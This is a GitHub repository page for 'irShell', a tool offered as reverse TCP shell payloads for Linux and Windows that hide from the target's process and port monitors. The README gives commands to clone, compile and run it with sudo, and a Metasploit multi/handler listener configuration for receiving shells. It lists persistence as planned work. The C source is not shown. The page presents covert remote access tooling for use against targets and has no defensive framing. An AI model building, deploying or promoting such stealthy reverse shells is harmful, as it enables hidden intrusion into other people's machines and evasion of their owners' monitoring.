Skip to content
/ irShell Public

💯% Invisible Reverse TCP Shell Payloads for Linux/Windows 🥷

4 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

MBHudson/irShell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
README.md
README.md
 
 
Screenshot_20221106-222819_JuiceSSH.jpg
Screenshot_20221106-222819_JuiceSSH.jpg
 
 
Screenshot_20221106-222822_JuiceSSH.jpg
Screenshot_20221106-222822_JuiceSSH.jpg
 
 
Screenshot_20221106_223907.jpg
Screenshot_20221106_223907.jpg
 
 
irShell.c
irShell.c
 
 
ports.jpg
ports.jpg
 
 

Repository files navigation

irShell

💯% Invisible Reverse TCP Shell Payloads for Linux/Windows 🥷

About:

What I believe to be an original and effective method for creating reverse TCP payloads that are 100% invisible not only to the target but the target's resource/process monitors, no PIDs or even open ports are visible. Simple MSFconsole handlers/listeners are then used for callbacks.

Pictured above is some Nmap and Grep output referencing this payloads used ports still showimg closed or not in use on the machine where the payload has been deployed. Pictured below are two screen captures of the same system's Htop output showing no process/PID

Requirments:

SHC

sudo apt install -y shc

Bash

sudo apt install -y bash

GCC

sudo apt install -y gcc

Installation:

git clone https://github.com/MBHudson/irShell.git && cd irShell && sudo gcc irShell.c -o irShell && sudo chmod +x irShell

Usage:

sudo ./irShell

MSFconsole:

set exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

TODO

  • Persistence without reboot
  • EXE and Shell formats
  • All-in-One built-in dependency installation

About

💯% Invisible Reverse TCP Shell Payloads for Linux/Windows 🥷

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages